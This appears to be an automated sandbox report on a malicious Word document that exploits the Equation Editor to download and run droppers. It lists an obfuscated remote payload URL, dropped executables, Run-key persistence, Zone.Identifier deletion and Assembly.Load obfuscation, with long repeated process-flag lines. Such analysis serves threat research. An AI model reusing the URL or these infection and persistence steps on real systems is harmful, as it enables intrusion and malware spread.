              Source: Binary string: axHFC:\kozabog.pdbX source: regasm.exe, 00000007.00000000.921784664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, regasm.exe, 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, regasm.exe, 00000009.00000000.926919421.0000000000401000.00000020.00000001.01000000.00000004.sdmp, efbhiii, 0000000D.00000000.1016958723.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii, 0000000D.00000002.1022657509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii, 0000000E.00000000.1021674670.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii, 00000019.00000002.1137304433.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii, 00000019.00000000.1128348708.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii, 0000001A.00000000.1135363474.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii.11.dr
              Source: Binary string: C:\kozabog.pdb source: regasm.exe, regasm.exe, 00000007.00000000.921784664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, regasm.exe, 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, regasm.exe, 00000009.00000000.926919421.0000000000401000.00000020.00000001.01000000.00000004.sdmp, efbhiii, 0000000D.00000000.1016958723.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii, 0000000D.00000002.1022657509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii, 0000000E.00000000.1021674670.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii, 00000019.00000002.1137304433.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii, 00000019.00000000.1128348708.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii, 0000001A.00000000.1135363474.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii.11.dr

              Data Obfuscation

              barindex
              Source: A173.exe.11.dr, u0001/u0002.cs.Net Code: \x01 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: Wlrfmqer.exe.15.dr, u0001/u0002.cs.Net Code: \x01 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: nEdENIr.exe.27.dr, u0001/u0002.cs.Net Code: \x01 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Users\Public\regasm.exeCode function: 7_2_0040681C push eax; ret 7_2_0040683A
              Source: C:\Users\Public\regasm.exeCode function: 7_2_0040A1E1 push ecx; ret 7_2_0040A1F4
              Source: C:\Users\Public\regasm.exeCode function: 7_2_001B2372 push 4FFBBE53h; ret 7_2_001B2392
              Source: C:\Users\Public\regasm.exeCode function: 7_2_001B2FF7 push dword ptr [eax+4EB63366h]; iretd 7_2_001B3003
              Source: C:\Users\Public\regasm.exeCode function: 9_2_00402857 push dword ptr [eax+4EB63366h]; iretd 9_2_00402863
              Source: C:\Users\Public\regasm.exeCode function: 9_2_00401BD2 push 4FFBBE53h; ret 9_2_00401BF2
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 13_2_001B2372 push 4FFBBE53h; ret 13_2_001B2392
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 13_2_001B2FF7 push dword ptr [eax+4EB63366h]; iretd 13_2_001B3003
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 14_2_00402857 push dword ptr [eax+4EB63366h]; iretd 14_2_00402863
              Source: C:\Users\user\AppData\Roaming\efbhiiiCode function: 14_2_00401BD2 push 4FFBBE53h; ret 14_2_00401BF2
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_042C6CA9 push ds; iretd 15_2_042C6CAF
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_0470ACC1 pushad ; retf 0067h15_2_0470ACD9
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_0470798D push 000000C3h; ret 15_2_04707F25
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_0470CB61 pushad ; retf 15_2_0470CB6D
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_04726F8B push 8B500313h; iretd 15_2_04726F90
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_0472799D push esp; iretd 15_2_0472799E
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_04755C23 push 8B031373h; iretd 15_2_04755C28
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_04759518 push 8B031373h; iretd 15_2_0475951D
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_0475085C push eax; retf 15_2_0475085D
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_0499238F push 8B031369h; iretd 15_2_04992394
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_049C5930 push esp; iretd 15_2_049C5931
              Source: C:\Windows\explorer.exeCode function: 17_2_00061405 push esi; ret 17_2_00061407
              Source: C:\Windows\explorer.exeCode function: 17_2_000647A7 push esp; iretd 17_2_000647A8
              Source: C:\Windows\explorer.exeCode function: 17_2_000614D4 push esi; ret 17_2_000614D6
              Source: C:\Windows\explorer.exeCode function: 17_2_0006A055 push es; iretd 17_2_0006A05D
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_3_000D8BE1 push ebp; retf 0000h18_3_000D8BE2
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_3_000D8BE1 push ebp; retf 0000h18_3_000D8BE2
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_3_000D8BE1 push ebp; retf 0000h18_3_000D8BE2
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_3_000D8BE1 push ebp; retf 0000h18_3_000D8BE2
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_3_000D8BE1 push ebp; retf 0000h18_3_000D8BE2
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_3_000D8BE1 push ebp; retf 0000h18_3_000D8BE2
              Source: C:\Users\Public\regasm.exeCode function: 7_2_0041105A LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,7_2_0041105A

              Persistence and Installation Behavior

              barindex
              Source: webSettings.xml.relsExtracted files from sample: http://000!0000020000322000000010023000004000050000230000000@3236135985/000000_0000000_000000_000000_0000000_000000_000000/0000_000000_00000.doc
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\efbhiiiJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\A173.exeFile created: C:\Users\user\AppData\Local\Temp\tmpG115.tmp (copy)Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\A173.exeFile created: C:\Users\user\AppData\Roaming\nEdENIr\nEdENIr.exeJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A173.exeJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\efbhiiiJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\A173.exeFile created: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\regasm.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\regasm.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_0376055E LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,5_2_0376055E

              Boot Survival

              barindex
              Source: C:\Users\user\AppData\Local\Temp\A173.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run nEdENIr
              Source: C:\Users\user\AppData\Local\Temp\A173.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run WlrfmqerJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\regasm.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\A173.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run WlrfmqerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run WlrfmqerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run nEdENIr
              Source: C:\Users\user\AppData\Local\Temp\A173.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run nEdENIr

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\efbhiii:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeFile opened: C:\Users\user\AppData\Roaming\nEdENIr\nEdENIr.exe:Zone.Identifier read attributes | delete
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\A173.exeProcess information set: NOOPENFILEERRORBOX
